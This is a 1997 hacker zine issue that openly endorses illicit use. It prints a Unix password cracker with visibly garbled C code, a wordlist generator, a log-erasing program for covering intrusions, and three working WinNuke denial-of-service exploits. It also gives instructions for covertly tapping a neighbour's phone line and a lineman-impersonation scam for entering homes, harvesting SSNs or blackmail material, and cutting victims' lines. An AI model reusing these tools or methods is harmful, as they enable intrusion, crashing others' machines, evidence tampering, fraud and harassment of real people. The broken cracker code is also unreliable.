Copy Link
Add to Bookmark
Report

The Havoc Technical Journal 11

  

ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³The HAVOC Technical Journal ³±
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ±
±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±

Vol. 1 | No.11 | June 1st, 1997 | A HAVOC Bell Systems Publication

HAPPY ANIVERSARY TO THTJ! 1 YEAR AND GOING STRONG! WOO HOO!
_____________________________________________________________________________

-[The HAVOC Technical Journal Issue 11]-
Editorial..............................Scud-O
crack-passwd.c ........................Scud-O
Getting away scott free................The Banshee
Winnuke Info & Code....................Snapple
REality's Digital Dictionary...........REality
Generate.pas ..........................Scud-O
Back Door to MicroType.................WeatherM
Mobile Phreaking.......................phear.
Java Mail Forging & Bombing............Scud-O
Line Man Impersonation.................phear.
Securities Hole in cgi-bin.............memor
The History of Caffeine................Scud-O
Untitled...............................It's a secret
Looking Back, a year later.............Scud-O
The News...............................KungFuFox
Phonecalls.............................THTJ

-------------------------------------------------
[WE HAVE MOVED]
Hell, most of you probably already know this, but thanks to JP we are
now at: http://www.antionline.com/hbs/

[ArcAngl Joins HBS]
Yes, yet another #phreak brother has joined up with HBS. Arc is one
cool mofo, and let knows his shit. He lives kinda near Scud-O, so watch for
halarious anidotes coming from their stories of trashing, getting busted,
drinking, fast driving, etc. Note: Watch out for Acura Integras and Poniac
Grand Prix LE's drag racing!
_____________________________________________________________
[ Soul Coughing FUCKING OWNS! ]
Well, at the HFStival in RFK Staduim in Washington DC took place on
May 31st, and i would like to thank Sould Coughing for letting me hang with
them. YOU GUYS FUCKING OWN! If you have never heard any of Soul Coughing's
music, go run ( not walk ) to a store and buy "Irresistible Bliss" their
newest CD, or pick up some of the older CDs. Also, if you have the X-Files CD
Soundtrack, pop it in and play sone number 2, 'Unmarked Helicopters' and hear
Soul Coughing's wonderful music.
_____________________________________________________________

The HAVOC Technical Journal - Information
- Editor in Chief : Scud-O, FoxMulder@worldnet.att.net
- Assitant Editor : KungFuFox, mazer@cycat.com
- Submissions Editor: Keystroke, keystroke@thepentagon.com
- THTJ email address: thtj@juno.com
- THTJ website: http://www.antionline.com/hbs/
- THTJ mailing address: PO BOX 448 Sykesville, MD 21784

The HAVOC Technical Journal Vol. 1, No.11, June 1st, 1997.
A HAVOC Bell Systems Publication. Contents Copyright (©)
1997 HAVOC Bell Systems Publishing. All Rights Reserved.
No part of this publication may be reproduced in whole or
in part without the expressed written consent of HAVOC
Bell Systems Publishing. [No copying THTJ, damnit.]

The HAVOC Technical Journal does in no way endorse the
illicit use of computers, computer networks, and
telecommunications networks, nor is it to be held liable
for any adverse results of pursuing such activities.
[Actually, to tell you the honest to goodness truth, we
do endorse that stuff. We just don't wanna get in trouble
if you try it for yourself and something goes wrong.]


For infomation about using articles published in THTJ, send mail to:
e-mail: thtj@juno.com
mail: THTJ
c/o HBS
PO Box 448
Sykesville, MD 21784
_____________________________________________________________
[Editorial : by Scud-O] Money..........

Money, get away
Get a good job with more pay and you're O.K.
Money it's a gas
Grab that cash with both hands and make a stash
New car, caviar, four star daydream,
Think I'll buy me a football team

Money get back
I'm alright Jack keep your hands off my stack.
Money it's a hit
Don't give me that do goody good bullshit
I'm in the hi-fidelity first class travelling set
And I think I need a Lear jet

Money it's a crime
Share is fairly, but don't take a slice of my pie
Money so they say
Is the root of all evil today
But if you ask for a rise it's no surprise that they're
giving none away.

- 'Money' by Pink Floyd from 'Dark Side of the Moon'
Lyrics by Roger Waters.

This month, i am going to have a little chat with you on money. Why
you ask? Well, let me blurt it out. Earlier this month, while checking my mail
at the local Post Office, i was approached, and offered a buy out bid for
The HAVOC Technical Journal. Yes, thats right, some one wanted to buy this
very zine that you are reading. Shocked? Well, so was I, especially when i
read the 'contract'.

The 'Contract'
--------------

Ok, the person who approached me and offered me this money, the amount
of which ill get to in a minute, gave me this contract before heading out the
door.
It states that one, Scud-O aka __(My REAL Name would go here)___ is
to be paid $10,000 for The HAVOC Technical Journal, Any and all copyrights
held for THTJ, And my current computer.

Ok, now that sounds like a good deal but read on....

The restrictions on the editor and writing staff were as follows:

o I ( Scud-O) can never write or edit another zine, either in print,
or online, and is far as the rest of this document explained, It
looked like i could never work and a h/p zine, or even a NORMAL
zine like Time, Newsweek, etc.

o Any and all past writers can never write for another zine, either
in print or online. Now, this is just simply unenforcible, as i have
no control over the other writers. They will still continue to write
articles for many zines. I think this was added, so if i had volated
the contract that they could sue me, and at least be gareented the
10000 they paid me.


So, after reading this, well i threw out the contract. There is no way
that i am going to give up THTJ or my freedom to edit a zine, or even write
articles for them. Maybe some of you are saying, 'hey just use a different
nick' , well this would not work, since if the traced the zine to me, which
probably wouldnt be hard to do, They could sue me for breach of contract,
and sue my ass off.
In the end, i hope you liked the view i took, and decided to keep
THTJ.
Scud-O , Founder, and Editor in Chief of THTJ


Scud-O and HBS would like to hear your views on this issue.
Please feel free to e-mail us at: FoxMulder@worldnet.att.net

----------------------------------------------
/ ---/ --/ / / | /------/ / /
/--- /-----/------/-----/ / / /
/----------/ /--------/
-of HAVOC Bell Systems-

FoxMulder@worldnet.att.net | http://www.antionline.com/hbs/

_____________________________________________________________
[ No We are NOT Going to Stop ]
Earlier this month, I had mentioned to a few people that i was
thinking of giving up thtj. Well, this is false. I had looked into giving
up on the h/p scene in general, but after a few beers, i changed my mind, I
am going to keep this zine going.
I would like to thank JP for telling people that i was thinking of
giving up and stop publishing thtj. And a REAL big thanks to the hundreds of
you who sent me e-mail saying to keep up the good work on the zine. Thanks.
_____________________________________________________________
[ crack-passwd.c - A Password Cracker by Scud-O]

Ok, well, why this may not be the greatest cracker out there, this
has a variety of features, and does more cracking than other conventional
password crackers out there. This is for the UNIX platform, and i have no
intention of porting it to DOS, since well, i dont feel like porting crypt()
along with it.

/*******************************************************************
*
* crack-passwd.c - A Password Cracker by Scud-O for THTJ11.
*
* Usage: crack-passwd [-w wordlist]
*
* This is a fairly advanced cracker, first it gets the GECOS field, and
* modifies it, etc and trys it as the password. if this fails, then it goes
* to the wordlist that you specify, or the /usr/dict/words if you leave it
* blank.
*
* All comments to: Scud-O at <FoxMulder@worldnet.att.net>
*
* Improvements needed : a faster crypt() method would be nice, maybe ill
* try crypt(3), hmmmm. also a faster try() would be nice.
* Also: adding the joetest.c code could be nice, but it's not needed.
*********************************************************************/


#include <ctype.h>
#include <stdio.h>
#include <pwd.h>
#include <sys/param.h>
#include <sys/time.h>

#define DEF_WORDLIST "/usr/dict/words"
#define MAXWORDS 32767
#define NW 64

int ndictwords = 0;

char *pname;
char *wordfile = DEF_WORDLIST;
char wordlist[MAXWORDS][9];

main(argc, argv)
{
char **argv;
int argc;

{
char * try();
register chat *passwd;
register struct passwd *pw;

setlinebuf(stdout);
pname = *argv;

/* Process the arguments */
while (--argc)
{
if ( **++argv != '-')
/* Yuck, a goto! i should change this.... */
goto usage;

switch ( *++*argv)
{
case 'w':
if (--argc <= 0)
/* Again! */
goto usage;

wordfle = *++argv;
break;
default:
usage: fprintf(stderr, "Usage: %s [-w wordfile\n", pname);
exit(1);

}
}

/* load up the wordlist */
load_wordlist();

/* For each password file line..... */
while((pw = getpwant()) != NULL)
{
/* Look at the excrypted password. If it's not 13 characters,
* the password is a fake value. ( or its, yuck encrypted) */


switch (strlen(pw->pw_passwd))
{
case 13:
/* Crack the biatch */
if (( passwd = try(pw)) != NULL)
{
printf("%s was cracked, password is %s\n",
pw->pw_name, passwd);
}

break;

case 0:
/* Error, an invalid password */
printf("Error - a zero length password : %s\n",
pw->pw_name);
break;

default:
break;
}
}
exit(0);
}

/****************************************
* try() - this function does the cracking
****************************************/


char *try(pw)
struct passwd *pw;
{
char *crypt();
char *words[NW];
register char *s;
static char buf[1024];
register int i, nwords;

/* Build a list of words - the login name, and words from GECOS */
words[0] = pw->pw_name;

nwords = 1;
s = pw->pw_gecos;

while (*s == ' ' || *s == '\t')
s++;

while (*s != ',' && *s != '\0' && nwords < NW)
{
while (*s == ' ' || *s == '\t')
*s++ = '\0';

words[nwords++] = s;

while ( *s != ' ' && *s != '\t' && *s != ',' && *s != '\0')
s++;
}

*s = '\0';

/* Ok, now lets try all those words in various permutations. */

for (1 = 0; 9 < nwords; i++)
{
if (!strcmp(pw->pw_passwd, crypt(words[i], pw->pw_passwd)))
return(words[i]);
reverse(words[i], buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
lower(words[i], buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
reverse(buf, buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
upper(words[i], buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
reverse(buf, buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
capital(words[i], buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
reverse(buf, buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
}

/* Ok, that didn't work, lets try the dictionary */

for ( i=0; 1 < ndcitwords; i++)
{
if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd)))
return(wordlist[i]);
reverse(wordlist[i], buf);

if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd)))
return(buf);
lower(wordlist[i], buf);

if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd)))
return(buf);
reverse(buf, buf);

if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd)))
return(buf);
upper(wordlist[i], buf);

if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd)))
return(buf);
reverse(buf, buf);

if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd)))
return(buf);
capital(wordlist[i], buf);

if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd)))
return(buf);
reverse(buf, buf);

if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd)))
return(buf);
}

return(NULL);
}

/* load_wordlist() - read the wordlist into memory. Pretty simple */
load_wordlist()
{
FILE *fp;
char word[BUFSIZ];

if ((fp = fopen(wordfile, "r")) == NULL)
{
fprintf(stderr, "%s: cannot open %s.\n", pname, wordlist);
exit(1);
}

while(ndictwords < MAXWORDS && fgets(word, BUFSIZ, fp) != NULL)
{
word[strlen(word)-1] = '\0'; /* strip the newline character */
strncpy(wordlist[ndictwords], word, 8);
wordlist[ndictwords++][8] = '\0';
}

fclose(fp);
}

/* lower() - convert (s) to lower case (t) */
lower(s,t)
register char *s, *t;
{
while(*s)
{
*t++ = isupper(*s) ? tolower(*s) : *s;
s++;
}
}

/* upper() - convert (s) to upper case (t) */
upper(s,t)
register char *s, *t;
{
while(*s)
{
*t++ = islower(*s) ? toupper(*s) : *s;
s++;
}
}

/* capital() - capitalize (s) and store it (t) */
captial(s,t)
register char *s, *t;
{
*t++ = islower(*s) ? toupper(*s) : *s;
s++;

while(*s)
{
*t++ = islower(*s) ? toupper(*s) : *s;
s++;
}
}

/* reverse() - reverse (s) and store it (t) */
reverse(s, t)
register chat *s, *t;
{
register char *p;

p = &s[strlen(s) - 1];

while ( p >= s)
*t++ = *p--;
*t = '\0';
}

_____________________________________________________________

************************* | If you dont like it then eat me cuz its free
Getting away scott free. | information and you should be trying to get
by The Banshee | as much as that as you can before we all
This was written for THTJ | blow up and die a terrible horrible death
cuz the zine is the bomb | cuz big brother is watching..
************************* | BE PARANOID!

Everyday you see some dumbass wanna be hacker getting arrested, suspended
from school, kicked out of the house, getting raided by the feds for the
stupid ass reason that the dumb fucker doesnt know how to edit log files!
In this text I am going to explain the varius log files, and where to find
them and how to edit and replace them, using either your greatest hacking
tool yet, that being pico, or use one of the log editor programs.

In this day in age, people use the internet as good ways to access other
computers. Good idea, but you are also more succeptible to log files. When
you gain root on a dial up there are no log files to be dealt with. The only
true worry is that someone will trace your number back to the original caller.
but that is easily by passed by simply not doing it from your house. Here is
a simple plan for using your neibors phone line to do your deeds (I am lucky
for I have a kid next door who tells everyone hes a hacker so if I ever get
caught its him who gets the blame).

Ok here we go, on most rural or suburban
neiborhood there are little gray boxes on the sides of the houses, which
are locked by a simple screw that you can unscrew in a matter of seconds.
This little gray box contains usually two phone lines that lead up into
the house. If the person has two phone lines then the two jacks will be two
different lines, if they have one phoneline then both jacks will be the same
line. Ok, if the person has only one phone line you are good to go. (Make
sure you do this at night or when your neigbors are away on vacation) Dig
a small ditch from your neigbors gray box to your house's nearest window,
then get some long phone cords (Usually found at radio shack) and run it from
the gray box to your nearest phone in your house. Cover up the ditch and you
got yourself a nice phone line to do what you like.

But what if the house has two phonelines and you cant dissconnect one of
thier lines just for you to use, you may ask. That is right thats just
screamin for yourself to get caught, so heres what you do!

Go to radio shack and pick up a splitter they kinda look like this
||
---
/ \
|_____|
I know thats a real lame depiction of the splitter itsself, but uhm what
it does is you can split one line into two lines. So do the same as the one
liner and dig a ditch etc etc, but put the splitter in and lead one line
into your neibors house and the other to your house, so no suspision when
they use their second phone line and the have no dial tone..Also I suggest
you do all your callin on their phone line when they are not home, and dont
try to listen in on their phone calls cuz each time you pick up the phone
thers a really loud click that the other party can hear..Use it just for
doing the stuff you wouldnt dare using your phone line to do.
So when the cops start pullin up, you dont have to worry its all next door.

Now on too unix, and linux. When you do anything on a linux server, you are
logged. The three main log files you really should worry about are 'lastlog',
'UTMP', and 'WTMP' The only way to edit these files is if you have root
cuz only root owns these files. Heres a breif description of the 3 important
log files.

LastLog - Where the last login came from.
WTMP - every log on and off, with login and logout time plus tty and host.
UTMP - Who is currently logged in on the server.

Heres where they can be found on vairus operating sytems.
Usually in linux you can find all the log files in /usr/var/adm

LastLog UTMP WTMP | If one of them is in one of those
------- ------ ------ | directorys, all the rest tend to be in
/usr/var/adm /etc /etc | the same direcorys. And dont forget
/usr/adm /var/adm /var/adm | if you used the famed phf exploit
/var/adm /usr/var /usr/var | to get your password file that you
/var/log /usr/adm /usr/adm | cracked, dont forget to erase everything
/var/log /var/log | in the /httpd/logs file, in which a lot
| of hackers neglect to do!

Things not to do
----------------
Never, ever, ever, ever totally delete the log files for the fact that
root then knows that there was a hacker in the mists of his system.

Dont go into /etc/motd and change the motd. Thats the first thing most lame
fuckers do, and thats just another way of screaming 'A HACKER WAS HERE!'
(Why is it when someone acctually gets into a system they feel compled to
tell someone that they were there?)

Dont put in suid root shells anywhere, your better off compiling a backdoor
so you can access it anytime without being noticed by commands like user or
finger..

Dont hack the webpage the server is using, unless you have a pretty damn good
reason to do it and not just to show off to your friends and to try to be
cool

Some codes to help you along the way
------------------------------------
Marry.c is a great program for editing log files. Lots of flags to play with
and over all its a great fucking program to use to edit and spoof logs.
You can get the source redily at most sites that offer "hacking" codes. Im
sure alot of people can back me up in saying this is one of the best.
(http://www.rootshell.com is one of the places you can get it)

This next program basicly just erases yourself from all the logs, its simple
but it also screams to the sysadmin that there was a hacker present in the
machine

#include <fcntl.h>
#include <utmp.h>
#include <sys/types.h>
#include <unistd.h>
#include <lastlog.h>

main(argc, argv)
int argc;
char *argv[];
{
char *name;
struct utmp u;
struct lastlog l;
int fd;
int i = 0;
int done = 0;
int size;

if (argc != 1) {
if (argc >= 1 && strcmp(argv[1], "cloakme") == 0) {
printf("You are now cloaked\n");
goto start;
}
else {
printf("close successful\n");
exit(0);
}
}
else {
printf("usage: close [file to close]\n");
exit(1);
}
start:
name = (char *)(ttyname(0)+5);
size = sizeof(struct utmp);

fd = open("/etc/utmp", O_RDWR);
if (fd < 0)
perror("/etc/utmp");
else {
while ((read(fd, &u, size) == size) && !done) {
if (!strcmp(u.ut_line, name)) {
done = 1;
memset(&u, 0, size);
lseek(fd, -1*size, SEEK_CUR);
write(fd, &u, size);
close(fd);
}
}
}


size = sizeof(struct lastlog);
fd = open("/var/adm/lastlog", O_RDWR);
if (fd < 0)
perror("/var/adm/lastlog");
else {
lseek(fd, size*getuid(), SEEK_SET);
read(fd, &l, size);
l.ll_time = 0;
strncpy(l.ll_line, "ttyq2 ", 5);
gethostname(l.ll_host, 16);
lseek(fd, size*getuid(), SEEK_SET);
close(fd);
}
}


Now as a concluding paragraph Ive decided to show you why you should be
paranoid as shit.

The first and only time I was busted wasnt because I neglected to
erase log files, or I told eveyone about my doings, it was because there
was a large suspision that I was an alleged "hacker". So because of this
I was not only kicked out of college, I also found out that I was being
watched for 3 weeks including undercover bitches posing as my classmates
to try to rip out info on me..You can call this discrimination, biased
thoughts, or whatever you want, but the fact is, no one even likes the term
hacker, the simple word brings up thoughts of some punk teen giving other
people virus's. Much like marijuana legalazation, gay rights, abortion,
racisim, hacking is a very very touchy subject that our governmetn likes
to brush under the carpet and try to just forget it. But its there, and
the hackers like codezero (hacking amnesty international) are giving
the real hackers a bad name, givin the term hacker even more of a
discriminitory meaning..What Im trying to say here is, be paranoid, dont
talk shit, and look after your own ass.



_____________________________________________________________

Editor's note: Well it seems that some people to read directions and send in
their articles to our submissions editor, keystroke. Thanks to key for passing
this along and to Snapple for writing it. This is a popular topic these days,
so have fun using the code you all.

WinNuke Pack 1.0 by Snapple(root@techie.com)
============================================

Another sloppy piece of Microsoft coding.

It is possible to remotly cause denial of service to any of the operating systems listed below.
by sending Out of Bounds data to NetBios, port 139.The users carrier will drop and cause
Windows to execute a general protection fault (crash). Obviously you will need an ip address
and the target machine will also need an ip address(ie: inet connection).

Systems that are affected are:
- Windows 3.11
- Windows 95
- Windows NT 3.51
- Windows NT 4.0

What the pack contains
======================

- winnuke ansi c source code (linux, bsd, sunos)*
- perl script version of winnuke.*
- Visual C++ version of winnuke (MsWindows platforms).*
- Win95 winnuke binary(winnu95.zip).
- Mac winnuke source (winnuke-10-source.hqx).
- Mac winnuke binary. (WinNuke_1_0_FAT.sit).

* code inserted into article below.

Some Final Words
================
"Download and apply the patches and perhaps you're safe for the next few weeks.
That is, untill the next Microsoft bug surfaces.... This will go on forever. Are you
getting sick and tired of this? Are you fed up with giving your money to Bill Gates -
already the richest man in the world - and getting all this crap in return? Then
perhaps you're ready for an alternative. Perhaps you're ready for Linux.

Linux is an exciting and powerfull operating system with millions of happy users
world wide. It's the fastest growing operating system in existence. The brightest
minds of the computing world contribute to it. They don't do it for money, they do
it because they want the best system possible. "
(quoted)


Snapple.(root@techie.com)
=========================



Ansi C code. ( by _eci)
=======================
--- CUT HERE ---

/* winnuke.c - (05/07/97) By _eci */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */


#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#define dport 139 /* Attack port: 139 is what we want */

int x, s;
char *str = "Bye"; /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;


int open_sock(int sock, char *server, int port) {
struct sockaddr_in blah;
struct hostent *he;
bzero((char *)&blah,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);


if ((he = gethostbyname(server)) != NULL) {
bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
}
else {
if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
perror("gethostbyname()");
return(-3);
}
}

if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
perror("connect()");
close(sock);
return(-4);
}
printf("Connected to [%s:%d].\n",server,port);
return;
}


void main(int argc, char *argv[]) {

if (argc != 2) {
printf("Usage: %s <target>\n",argv[0]);
exit(0);
}

if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}

open_sock(s,argv[1],dport);


printf("Sending crash... ");
send(s,str,strlen(str),MSG_OOB);
usleep(100000);
printf("Done!\n");
close(s);
}

--- CUT HERE ---






Perl script Winnuke (by Ghent)
========================
--- CUT HERE ---
#!/usr/bin/perl
# Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci

use strict; use Socket;
my($h,$p,$in_addr,$proto,$addr);
$h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]);
if (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n"; }
$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;
connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;
print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S;
--- CUT HERE ---



Windows Nt/95 winnuke source (by Eugene Surovegin)
==========================================
--- CUT HERE ---
// Windows NT port by Eugene Surovegin <ebs@glasnet.ru>
// Compiled with MS Visual C++ 4.2b, tested on NT 4.0 SP2

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <winsock.h>

#define dport 139 /* Attack port: 139 is what we want */

int open_sock(int sock, char *server, int port) {

struct sockaddr_in blah;
struct hostent *he;
int res;

memset((char *)&blah,0,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);

if ((he = gethostbyname(server)) != NULL)
memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);
else
if ((blah.sin_addr.s_addr = inet_addr(server))==INADDR_NONE) {
puts("Cannot resolve host");
return(-3);
}

if (res=connect(sock,(struct sockaddr *)&blah,16)==-1) {
puts("Cannot connect socket");
return(-4);
}
printf("Connected to [%s:%d].\n",server,port);
return 0;
}


void main(int argc, char *argv[]) {

int s;
char *str = "Bye"; /* Makes no diff */
int port=0;

if ( (argc<2) || (argc>3)) {
printf("Usage: %s <target> [<port>]>\n",argv[0]);
exit(0);
}

if (argc==3) port=atoi(argv[2]);
if (!port) port=dport;

WSADATA wsaData;
if (!WSAStartup(MAKEWORD(1, 1), &wsaData)){
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))!=INVALID_SOCKET) {
if (!open_sock(s,argv[1],port)){
puts("Sending crash... ");
send(s,str,strlen(str),MSG_OOB);
puts("Done!");
}
else printf("Error connecting to host %s",argv[1]);
closesocket(s);
}
else puts("Error getting socket");
WSACleanup();
}
else puts("Cannot init Winsock");
}

--- CUT HERE ---


_____________________________________________________________

--=[ REality's Digital Dictionary ]=--
Written by REality
REF. Racal-DataCOM (elseberry@usa.net)



(Block)
A quantity of information transmitted as a discrete entity by its own starting and ending points, usually with its own control, routing, and error
correcting information.

(BMS) (Bandwidth Management Service)
An option availible with Accunet T1.5 service from my friend and yours AT&T to enable customers to use an on-premises terminal to reconfigure channels within their T1 trunkz in as little as one minute preventing the hassle of waiting on tech for 25 fucking years.

(BOC) (Bell Operating Company)
Any of the 22 local telephone companies divested from AT&T and reorganized into the seven regional Bell Holding Companies. Examples include Bellsouth, Bell Atlantic, Southwestern Bell, blah.

(BPS) (Bits per second)
A measure of speed in serial transmission. Also used to describe hardware capabilities. Examples of this shit include a USR 56KBps modem.

(Bridge)
A device that connects two LANs. Bridges function at the data link layer of the OSI model, and provide protocol-independent forwarding data between two totally fucking different networks.

(Broadcast)
The delivery of a transmission for two or more stations at the same time, such as over a bus-type local area network or for rich fuckers, by satelitte.

(Brouter) (WooHoo!)
A device that combines the functions of a bringe and a router. Can route one or more protocols, such as TCP/IP and XNS, and bridge all other traffic over to the local network. Otherwords, a brouter is tha' shit.

(Bypass)
Any private networking scheme that accesses long-distance transmission facialities without going through the local exahcnge carrier.

(Byte)
A computer-readable group of bits (normally 8 bits in length).

(Byte Stuffing)
The insertion of specific bytes of information into a stream of data to act as control characters for that certain stream of data.


_____________________________________________________________
[ Generate.pas ] by Scud-O

{$N+,E+}
PROGRAM Generate;
(*************************************************)
(* Generate 1 - A program to be used to generate *)
(* wordlists for password cracking. Uses *)
(* factorials and permutations to generate it *)
(* *)
(* See below on how to enlarge the list, etc. *)
(*************************************************)

TYPE
PermString = String[13];

FUNCTION Factorial(B : Byte) : Extended;
VAR
T : Extended;
N : Byte;

BEGIN
T := 1;
FOR N := 1 TO B DO T := T*N;
Factorial := T;
END;

PROCEDURE Xchg( VAR A, B : Char);
VAR T : Char;
BEGIN
T := A;
A := B;
B := T;
END;

FUNCTION PermOf(Org : Permstring; L : LongInt) : PermString;
VAR
P, Q : Byte;
Nump : LongInt;

BEGIN
PermOf := '';
IF L < 1 THEN Exit;
Nump := Round(Factorial(Length(Org)));
IF L > Nump THEN Exit;
Dec(L);
P := 0;
FOR Q :=Length(Org) DOWNTO 2 DO
BEGIN
Inc(P);
Nump := Nump DIV Q;
Xchg(Org[P] , Org[P + (L DIV Nump)]);
L := L MOD Nump;
END;
PermOf := Org;
END;


VAR
N : LongInt;
Wordfile : Text;

BEGIN
Assign( Wordfile, 'wordfile');
Append(Wordfile);

(******************************************************************
* Ok, to make this bigger and have a larger word file, first,
* Enlarger the number in the Round(Factorial(X)) and then where
* PermOf('letters') replace that with the letters you want to use
* I used append() so that you can keep buiding the list. have fun
*******************************************************************)

FOR N := 1 TO Round(Factorial(7)) DO
WriteLn(Wordfile, PermOf('abcdefg', N):5);
Close(Wordfile);

END.


_____________________________________________________________
The Weather Report: Back Door to MicroType
By: WeatherMan


MicroType is alittle typing tutor designed for
teaching in the classroom. I think its real pathetic
because they make it so you can't certain things you
want it to do. This my help you in your journeys.
First goto the \mt directory. Second find a file
called m.xxx xxx=bat or exe I don't really remember.
Third run it and it should give you a password prompt.
Fourth put in "010" and It will ask you if you want to
change the password or not. whuala, amaze your friends
and give me credit.

Contact Info:
weatherm@surfsouth.com
www.surfsouth.com/~weatherm
UIN Number: 1209195


_____________________________________________________________
[ Linemen Scams ] by phear.



Well fuck, here we go. Special thanks to whoever feels like
publishing this. After all without information we are all truly lost.
Ever been out beige boxing and thought to yourself, "self, this rules
but there has to be more"
.. almost as if something was missing? Well
ill tell ya, its not an overwhelming urge to accept the lord as your
saviour. (so maybe im a little bitter) I was out just doing the usual
beigeboxing the other night and I thought to myself. "Why should I be
forced to this in the dark at night in fear of being caught?"
And thats
when i realized i dont have too, in fact neither do you.

What better scam then to pretend your a lineman. Hopefully if
your beigeboxing you know know enough about phones to be a lineman if
not you could wing it if you had too. So here's what you do. Go buy
a white hardhat. Any white hardhat will do, just as long as it fits
right, I mean why be uncomfortable in the midst of phreaking? Then
rummage through your closet ( I know, I know, I would'nt want to go
in there either ) until you find a longsleeve light blue shirt. Grab
a pair of jeans too. Alright now, put it all on and look in the mirror.
Believe it or not you will look a whole hell of a lot like a lineman. Or
atleast enough for the general public to be fooled. Now what your missing
are tools. No lineman's outfit is complete without tools.

A utility belt isnt a bad idea but not a necessity, I've never
used one. You need a red phone, baseless of course. Preferrably a lineman's
handset, but those aren't always just readily available. If you want one
bad enough though just swipe one out of a Bell truck. The important thing
is that whatever phone you have, it's red. Remember were fooling the general
public here. You also have got to have a 7/16" hex driver, preferabbly with
a red handle but beggars cant be choosers. Hell when you swipe the phone
just swipe the hex driver too. In fact if you can, take the whole tool belt.
You also need a small flashlight, poor lighting or something, you never
know. Alright, you've got the outfit, tools, and a need to phreak.

Where to phreak at though? I mean you dont have a big white truck
with all sorts of compartments in it to make you totally legit. So you have
to maintain a low profile. Always pick a spot and then park a block from it
and walk there. Starting off you should hit a few houses. Places where
nobody's home, at work or something. Just walk up there and open up the
phonebox, act like you belong there. I gaurantee no one will even question
you for a minute. After you feel pretty confident move on to bigger and
better phreaks. Go hit a local buisness or two, but go inside and tell them
that you were sent from their phone company, whatever it is and that you are
doing a routine check on the lines because there's been some trouble a few
lines down etcetera.. Then go find the box, if you want, ask them to show
you the phone setup in the building. This is the best way to get confident
about a scam like this. Check it all out, pump them for information. Then
go back to the box and make a few free calls. If your going to go this far
though you should probably have a lineman's handset. Looks a lot more
professional. Then move on to large apartment complexes. These are
especially nice because the lines are always grouped together. Atleast
four in each box.

So now you have your method down and you feel pretty confident. What
can you really do with these new amazing lineman's powers? Well you know
that jerk your always pranking? Now you can go to his house and fuck his
shit up in broad daylight. In fact go to the door and talk to him about his
phone service for a minute or two. Ask him if he's been having trouble with
the lines, so on so forth. Ask him if he minds if you come in for a minute
and have a look at the phone lines in the house. Walk around and pay
attention. You never know what youll see, potential black mail info, or
maybe a bill with his ss# on it. Then explain to him that due to maintenance
purposes your going to have to disconnect his line for an hour or so. Then
go out to his phone box and do just that. Then go back up to the house and
tell him that you have an emergency and have to go, but you'll be back in
just a few minutes. Leave. Gee, did i forget to hook your shit back up?
Now the next time you call him you can tell him exactly what he looks like
and what his house looks like. He would probably never suspect the lineman.

This would probably be the point where you're wondering if this is
all just bullshit or not. Well, I'll tell ya. Or not. I have done this and
it works. Just maintain a very cool composure. Never act nervous or let
the "
victim" think you are unsure of yourself. Never go out any later than
4:00 or so, and don't stay in any one place for more than 20 minutes. One
more cardinal rule, if you see a real lineman, or a phonetruck, get the fuck
out of there. As much as I hate to think about it, impersonating a lineman
is a crime, and so is phone fraud so don't hang around. The linemen will
know a fake when they see one.

That's it. The lineman's scam can be pulled off by anyone, but don't
ever forget that it is a scam, and should be done cautiously. So if your
just tired of the same old beigebox routine and need a change of pace, just
say fuck it. Go be a lineman, you'll thank yourself.

